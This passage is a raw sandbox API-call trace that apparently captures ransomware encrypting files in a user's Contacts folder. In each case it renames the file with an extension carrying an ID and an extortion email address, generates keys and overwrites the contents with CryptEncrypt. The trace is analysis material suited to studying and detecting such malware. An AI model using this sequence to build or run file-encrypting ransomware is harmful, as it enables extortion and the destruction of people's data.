lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" [0160.678] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.AIR" [0160.678] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.681] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390 [0160.681] GetProcessHeap () returned 0x2e0000 [0160.681] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.681] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1172) returned 1 [0160.681] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x494 [0160.681] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.681] GetProcessHeap () returned 0x2e0000 [0160.681] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.681] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.681] WriteFile (in: hFile=0x390, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.683] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.683] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.683] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x494) returned 0x31d01e0 [0160.683] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x494) returned 0x31d0680 [0160.683] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.683] ReadFile (in: hFile=0x390, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x494, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x494, lpOverlapped=0x0) returned 1 [0160.683] SetFilePointer (in: hFile=0x390, lDistanceToMove=-1172, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.683] WriteFile (in: hFile=0x390, lpBuffer=0x31d0680*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0680*, lpNumberOfBytesWritten=0x2acf9c8*=0x494, lpOverlapped=0x0) returned 1 [0160.683] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d01e0 | out: hHeap=0x2e0000) returned 1 [0160.683] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0680 | out: hHeap=0x2e0000) returned 1 [0160.683] CloseHandle (hObject=0x390) returned 1 [0160.683] GetProcessHeap () returned 0x2e0000 [0160.683] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.683] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.683] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.683] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328e80 | out: hHeap=0x2e0000) returned 1 [0160.683] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328f08 | out: hHeap=0x2e0000) returned 1 [0160.683] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0160.684] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.684] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.684] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.684] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.684] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", dwFileAttributes=0x80) returned 1 [0160.684] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 61 [0160.685] GetProcessHeap () returned 0x2e0000 [0160.685] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x319d30 [0160.685] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" [0160.685] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.AIR" [0160.685] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.687] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390 [0160.687] GetProcessHeap () returned 0x2e0000 [0160.687] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.687] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1174) returned 1 [0160.687] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x496 [0160.688] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.688] GetProcessHeap () returned 0x2e0000 [0160.688] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.688] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.688] WriteFile (in: hFile=0x390, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.690] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.690] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.690] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x496) returned 0x31d01e0 [0160.690] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x496) returned 0x31d0680 [0160.690] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.690] ReadFile (in: hFile=0x390, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x496, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x496, lpOverlapped=0x0) returned 1 [0160.690] SetFilePointer (in: hFile=0x390, lDistanceToMove=-1174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.690] WriteFile (in: hFile=0x390, lpBuffer=0x31d0680*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0680*, lpNumberOfBytesWritten=0x2acf9c8*=0x496, lpOverlapped=0x0) returned 1 [0160.690] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d01e0 | out: hHeap=0x2e0000) returned 1 [0160.690] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0680 | out: hHeap=0x2e0000) returned 1 [0160.690] CloseHandle (hObject=0x390) returned 1 [0160.690] GetProcessHeap () returned 0x2e0000 [0160.691] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.691] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.691] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.691] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328f08 | out: hHeap=0x2e0000) returned 1 [0160.691] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328f90 | out: hHeap=0x2e0000) returned 1 [0160.691] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x70) returned 0x385368 [0160.691] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.691] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.691] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.691] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.691] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", dwFileAttributes=0x80) returned 1 [0160.691] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 51 [0160.691] GetProcessHeap () returned 0x2e0000 [0160.691] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xcc) returned 0x3470a0 [0160.691] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" [0160.691] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0160.691] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.694] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390 [0160.694] GetProcessHeap () returned 0x2e0000 [0160.694] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0160.694] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=412) returned 1 [0160.694] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x19c [0160.694] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.694] GetProcessHeap () returned 0x2e0000 [0160.694] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.694] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.694] WriteFile (in: hFile=0x390, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.695] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.696] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.696] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x19c) returned 0x319788 [0160.696] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x19c) returned 0x32f868 [0160.696] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.696] ReadFile (in: hFile=0x390, lpBuffer=0x319788, nNumberOfBytesToRead=0x19c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesRead=0x2acf9c8*=0x19c, lpOverlapped=0x0) returned 1 [0160.696] SetFilePointer (in: hFile=0x390, lDistanceToMove=-412, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.696] WriteFile (in: hFile=0x390, lpBuffer=0x32f868*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x32f868*, lpNumberOfBytesWritten=0x2acf9c8*=0x19c, lpOverlapped=0x0) returned 1 [0160.696] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0160.696] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0160.696] CloseHandle (hObject=0x390) returned 1 [0160.696] GetProcessHeap () returned 0x2e0000 [0160.696] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.696] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.696] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.696] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0160.696] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0160.696] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0160.696] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.696] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.696] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.696] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.696] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", dwFileAttributes=0x80) returned 1 [0160.697] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 60 [0160.697] GetProcessHeap () returned 0x2e0000 [0160.697] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xde) returned 0x319d30 [0160.698] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" [0160.698] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.AIR" [0160.698] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.699] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390 [0160.700] GetProcessHeap () returned 0x2e0000 [0160.700] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.700] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1177) returned 1 [0160.700] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x499 [0160.700] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.700] GetProcessHeap () returned 0x2e0000 [0160.700] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.700] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.700] WriteFile (in: hFile=0x390, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.701] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.702] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.702] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x499) returned 0x31d01e0 [0160.702] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x499) returned 0x31d0688 [0160.702] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.702] ReadFile (in: hFile=0x390, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x499, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x499, lpOverlapped=0x0) returned 1 [0160.702] SetFilePointer (in: hFile=0x390, lDistanceToMove=-1177, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.702] WriteFile (in: hFile=0x390, lpBuffer=0x31d0688*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0688*, lpNumberOfBytesWritten=0x2acf9c8*=0x499, lpOverlapped=0x0) returned 1 [0160.702] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d01e0 | out: hHeap=0x2e0000) returned 1 [0160.702] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0688 | out: hHeap=0x2e0000) returned 1 [0160.702] CloseHandle (hObject=0x390) returned 1 [0160.702] GetProcessHeap () returned 0x2e0000 [0160.702] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.702] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.702] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.702] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328f90 | out: hHeap=0x2e0000) returned 1 [0160.702] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329018 | out: hHeap=0x2e0000) returned 1 [0160.702] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0160.702] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.702] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.703] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.703] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.703] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", dwFileAttributes=0x80) returned 1 [0160.703] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 61 [0160.703] GetProcessHeap () returned 0x2e0000 [0160.703] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x319d30 [0160.703] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" [0160.703] 